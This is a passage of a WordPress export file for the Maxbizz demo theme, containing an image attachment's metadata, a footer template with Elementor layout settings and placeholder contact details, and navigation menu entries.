		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1450</wp:post_id>
		<wp:post_date><![CDATA[2020-12-08 03:04:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-08 03:04:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slide3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slide3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/slide3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:820;s:4:"file";s:18:"2020/12/slide3.jpg";s:5:"sizes";a:15:{s:6:"medium";a:4:{s:4:"file";s:18:"slide3-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:19:"slide3-1024x437.jpg";s:5:"width";i:1024;s:6:"height";i:437;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"slide3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"slide3-768x328.jpg";s:5:"width";i:768;s:6:"height";i:328;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:19:"slide3-1536x656.jpg";s:5:"width";i:1536;s:6:"height";i:656;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"slide3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"slide3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:19:"slide3-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:19:"slide3-1200x820.jpg";s:5:"width";i:1200;s:6:"height";i:820;s:9:"mime-type";s:10:"image/jpeg";}s:21:"woocommerce_thumbnail";a:5:{s:4:"file";s:18:"slide3-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";s:9:"uncropped";b:1;}s:18:"woocommerce_single";a:4:{s:4:"file";s:18:"slide3-600x256.jpg";s:5:"width";i:600;s:6:"height";i:256;s:9:"mime-type";s:10:"image/jpeg";}s:29:"woocommerce_gallery_thumbnail";a:4:{s:4:"file";s:18:"slide3-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"slide3-300x128.jpg";s:5:"width";i:300;s:6:"height";i:128;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"slide3-600x256.jpg";s:5:"width";i:600;s:6:"height";i:256;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"slide3-100x100.jpg";s:5:"width";i:100;s:6:"height";i:100;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_footer_builders/footer-1/</link>
		<pubDate>Fri, 24 Jul 2020 09:02:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_footer_builders&#038;p=300</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_White.svg" alt="Maxbizz">
				</a>			        
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Linkedin-in
											</a>
			<h6>About us</h6>		
					<ul>
							<li>
					<a href="#">					Contact us 
											</a>
									</li>
								<li>
					<a href="#">					Connect
											</a>
									</li>
								<li>
					<a href="#">					Subscribe
											</a>
									</li>
								<li>
					<a href="#">					Terms of use 
											</a>
									</li>
								<li>
					<a href="#">					Sitemap
											</a>
									</li>
						</ul>
					<ul>
							<li>
					<a href="#">					Careers
											</a>
									</li>
								<li>
					<a href="#">					Newsroom
											</a>
									</li>
								<li>
					<a href="#">					Case Studies
											</a>
									</li>
								<li>
					<a href="#">					Disclosures 
											</a>
									</li>
								<li>
					<a href="#">					Services
											</a>
									</li>
						</ul>
			<h6>contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>subscribe</h6>		
		<p>Subscribe to our newsletter. Be always in trend!</p><p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>300</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 09:02:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 09:02:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"fae9e04","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#16171E","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"bb981be","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"60673b0","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_White.svg","id":404},"_margin":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"1eb16be","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#C0C1C2","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"fa79ab8","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#FF8523","icon_secondary_color":"#FFFFFF","icon_primary_color":"#24262F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"1680f0a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"1267add","elType":"widget","settings":{"title":"About us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fbd6b12","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"265897a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"12","left":"0","isLinked":false}},"elements":[{"id":"1b77f88","elType":"widget","settings":{"icon_list":[{"text":"Contact us ","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Connect","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Subscribe","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Terms of use ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Sitemap","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"7e3afb4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50},"elements":[{"id":"b4606d1","elType":"widget","settings":{"icon_list":[{"text":"Careers","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Newsroom","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Case Studies","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Disclosures ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Services","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"e888848","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"6be35dc","elType":"widget","settings":{"title":"contacts","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05e2c05","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"1366f2d","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"388fcf5","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":false},{"id":"0c63cfe","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"36a2873","elType":"widget","settings":{"title":"subscribe","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"e349af9","elType":"widget","settings":{"wp":{"title":""},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-mc4wp_form_widget"},{"id":"b95d22f","elType":"widget","settings":{"editor":"<p>Subscribe to our newsletter. Be always in trend!<\/p>","text_color":"#C0C1C2"},"elements":[],"widgetType":"text-editor"}],"isInner":false}],"isInner":false},{"id":"de9425d","elType":"section","settings":{"background_background":"classic","background_color":"#16171E"},"elements":[{"id":"5c90953","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"7456be1","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"0bb002f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"23f3334","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#929399","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:3;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:3;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:2:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_text_style";a:5:{s:10:"text_color";i:2;s:16:"text_color_hover";i:2;s:11:"text_indent";i:2;s:26:"icon_typography_typography";i:2;s:25:"icon_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:3:"gap";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:27:"wp-widget-mc4wp_form_widget";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/771/</link>
		<pubDate>Thu, 10 Sep 2020 09:28:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=771</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>771</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:28:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:28:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[771]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>26</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1015/</link>
		<pubDate>Tue, 22 Sep 2020 03:23:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1015</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1015</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 03:23:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 03:23:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1015]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
